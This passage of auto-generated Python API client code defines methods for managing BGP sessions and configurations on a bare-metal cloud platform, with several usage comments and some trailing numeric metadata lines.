:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_bgp_session" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_bgp_session`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/bgp/sessions/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_bgp_config_by_project(self, id, **kwargs): # noqa: E501
"""Retrieve a bgp config # noqa: E501
Returns a bgp config # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_config_by_project(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to include deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpConfig
"""
kwargs['_return_http_data_only'] = True
return self.find_bgp_config_by_project_with_http_info(id, **kwargs) # noqa: E501
def find_bgp_config_by_project_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve a bgp config # noqa: E501
Returns a bgp config # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_config_by_project_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to include deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpConfig, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'include',
'exclude'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_bgp_config_by_project" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_bgp_config_by_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'include' in local_var_params and local_var_params['include'] is not None: # noqa: E501
query_params.append(('include', local_var_params['include'])) # noqa: E501
collection_formats['include'] = 'csv' # noqa: E501
if 'exclude' in local_var_params and local_var_params['exclude'] is not None: # noqa: E501
query_params.append(('exclude', local_var_params['exclude'])) # noqa: E501
collection_formats['exclude'] = 'csv' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpConfig",
401: "Error",
403: "Error",
404: "Error",
}
return self.api_client.call_api(
'/projects/{id}/bgp-config', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
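    # --- Serialization note (illustrative, not generated code) ---
    # Both `include` and `exclude` are registered in collection_formats as
    # 'csv', so a list value is joined into a single comma-separated query
    # parameter; e.g. include=['a', 'b'] (placeholder attribute names) is
    # sent as:
    #
    #     GET /projects/{id}/bgp-config?include=a,b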
def find_bgp_session_by_id(self, id, **kwargs): # noqa: E501
"""Retrieve a BGP session # noqa: E501
Returns a BGP session # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_session_by_id(id, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to include deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSession
"""
kwargs['_return_http_data_only'] = True
return self.find_bgp_session_by_id_with_http_info(id, **kwargs) # noqa: E501
def find_bgp_session_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve a BGP session # noqa: E501
Returns a BGP session # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_session_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to include deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSession, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'include',
'exclude'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_bgp_session_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_bgp_session_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'include' in local_var_params and local_var_params['include'] is not None: # noqa: E501
query_params.append(('include', local_var_params['include'])) # noqa: E501
collection_formats['include'] = 'csv' # noqa: E501
if 'exclude' in local_var_params and local_var_params['exclude'] is not None: # noqa: E501
query_params.append(('exclude', local_var_params['exclude'])) # noqa: E501
collection_formats['exclude'] = 'csv' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSession",
401: "Error",
403: "Error",
404: "Error",
}
return self.api_client.call_api(
'/bgp/sessions/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
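# A minimal usage sketch, assuming `api` is an instance of this generated API
# class and `session_uuid` holds a valid BGP session UUID ('device' below is a
# hypothetical nested attribute name):
#
# session = api.find_bgp_session_by_id(session_uuid, include=['device'])  # synchronous
# thread = api.find_bgp_session_by_id(session_uuid, async_req=True)  # asynchronous
# session = thread.get()  # blocks until the request thread finishes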
def find_bgp_sessions(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions # noqa: E501
Provides a listing of available BGP sessions for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_sessions(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSessionList
"""
kwargs['_return_http_data_only'] = True
return self.find_bgp_sessions_with_http_info(id, **kwargs) # noqa: E501
def find_bgp_sessions_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions # noqa: E501
Provides a listing of available BGP sessions for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_sessions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: return the response data only, without the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSessionList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_bgp_sessions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_bgp_sessions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSessionList",
401: "Error",
403: "Error",
}
return self.api_client.call_api(
'/devices/{id}/bgp/sessions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_project_bgp_sessions(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions for project # noqa: E501
Provides a listing of available BGP sessions for the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_project_bgp_sessions(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSessionList
"""
kwargs['_return_http_data_only'] = True
return self.find_project_bgp_sessions_with_http_info(id, **kwargs) # noqa: E501
def find_project_bgp_sessions_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions for project # noqa: E501
Provides a listing of available BGP sessions for the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_project_bgp_sessions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: return the response data only, without the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSessionList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_project_bgp_sessions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_project_bgp_sessions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSessionList",
401: "Error",
404: "Error",
}
return self.api_client.call_api(
'/projects/{id}/bgp/sessions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_bgp_neighbor_data(self, id, **kwargs): # noqa: E501
"""Retrieve BGP neighbor data for this device # noqa: E501
Provides a summary of the BGP neighbor data associated with the BGP sessions for this device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bgp_neighbor_data(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSessionNeighbors
"""
kwargs['_return_http_data_only'] = True
return self.get_bgp_neighbor_data_with_http_info(id, **kwargs) # noqa: E501
def get_bgp_neighbor_data_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve BGP neighbor data for this device # noqa: E501
Provides a summary of the BGP neighbor data associated with the BGP sessions for this device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bgp_neighbor_data_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: return the response data only, without the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSessionNeighbors, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bgp_neighbor_data" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_bgp_neighbor_data`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSessionNeighbors",
401: "Error",
403: "Error",
404: "Error",
}
return self.api_client.call_api(
'/devices/{id}/bgp/neighbors', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
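# A minimal sketch of the raw-response path described in the docstring above:
# with _preload_content=False the client returns the undecoded response object
# instead of a BgpSessionNeighbors model (`device_uuid` is a placeholder):
#
# raw = api.get_bgp_neighbor_data(device_uuid, _preload_content=False)
# payload = raw.data  # raw response bytes, left undecoded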
def request_bgp_config(self, id, bgp_config_request, **kwargs): # noqa: E501
"""Requesting bgp config # noqa: E501
Requests that BGP configuration be enabled for a project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_bgp_config(id, bgp_config_request, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param bgp_config_request: BGP config request to create (required)
:type bgp_config_request: BgpConfigRequestInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.request_bgp_config_with_http_info(id, bgp_config_request, **kwargs) # noqa: E501
def request_bgp_config_with_http_info(self, id, bgp_config_request, **kwargs): # noqa: E501
"""Requesting bgp config # noqa: E501
Requests that BGP configuration be enabled for a project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_bgp_config_with_http_info(id, bgp_config_request, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param bgp_config_request: BGP config request to create (required)
:type bgp_config_request: BgpConfigRequestInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: return the response data only, without the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'bgp_config_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method request_bgp_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `request_bgp_config`") # noqa: E501
# verify the required parameter 'bgp_config_request' is set
if self.api_client.client_side_validation and ('bgp_config_request' not in local_var_params or # noqa: E501
local_var_params['bgp_config_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `bgp_config_request` when calling `request_bgp_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'bgp_config_request' in local_var_params:
body_params = local_var_params['bgp_config_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/projects/{id}/bgp-configs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
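# A minimal sketch of the timeout options documented above: _request_timeout
# takes either a single total-timeout number or a (connection, read) pair
# (`project_uuid` and `config_request` are placeholders):
#
# api.request_bgp_config(project_uuid, config_request, _request_timeout=(3.05, 27))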
def update_bgp_session(self, id, default_route, **kwargs): # noqa: E501
"""Update the BGP session # noqa: E501
Updates the BGP session by either enabling or disabling the default route functionality. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bgp_session(id, default_route, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param default_route: Default route (required)
:type default_route: bool
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.update_bgp_session_with_http_info(id, default_route, **kwargs) # noqa: E501
def update_bgp_session_with_http_info(self, id, default_route, **kwargs): # noqa: E501
"""Update the BGP session # noqa: E501
Updates the BGP session by either enabling or disabling the default route functionality. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bgp_session_with_http_info(id, default_route, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param default_route: Default route (required)
:type default_route: bool
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: return the response data only, without the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'default_route'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_bgp_session" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_bgp_session`") # noqa: E501
# verify the required parameter 'default_route' is set
if self.api_client.client_side_validation and ('default_route' not in local_var_params or # noqa: E501
local_var_params['default_route'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `default_route` when calling `update_bgp_session`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'default_route' in local_var_params:
body_params = local_var_params['default_route']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/bgp/sessions/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
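# A minimal sketch, assuming `session_uuid` is a valid BGP session UUID: the
# required `default_route` boolean is the entire request body, so enabling the
# default route reduces to a single call.
#
# api.update_bgp_session(session_uuid, True)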
| 44.380313
| 312
| 0.59171
| 6,719
| 59,514
| 4.993303
| 0.039887
| 0.037914
| 0.058838
| 0.028972
| 0.966438
| 0.960805
| 0.956274
| 0.94918
| 0.94152
| 0.935261
